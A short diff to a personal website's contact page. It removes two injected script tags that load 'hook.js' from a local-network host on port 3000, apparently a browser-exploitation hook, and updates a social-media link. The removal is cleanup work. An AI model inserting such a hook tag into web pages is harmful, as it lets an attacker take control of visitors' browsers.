--- a/contact.html
+++ b/contact.html
@@ -17,7 +17,8 @@
 
   <title>Contact Me</title>  
 
-<link href="./main.css" rel="stylesheet"><script src="http://192.168.1.49:3000/hook.js"></script><script src="http://192.168.1.49:3000/hook.js"></script></head>
+<link href="./main.css" rel="stylesheet">
+</head>
 
 <body class="">
 <div id="site-border-left"></div>
@@ -99,7 +100,7 @@
                       <a href="http://www.facebook.com/tahir615" title="" class="fa-icon">
                         <i class="fa fa-facebook"></i>
                       </a>
-                      <a href="http://www.twitter.com/altahir2228" title="" class="fa-icon">
+                      <a href="http://www.x.com/T4H1R-v2" title="" class="fa-icon">
                         <i class="fa fa-twitter"></i>
                       </a>
                       <a href="http://www.linkedin.com/in/tahir615" title="" class="fa-icon">
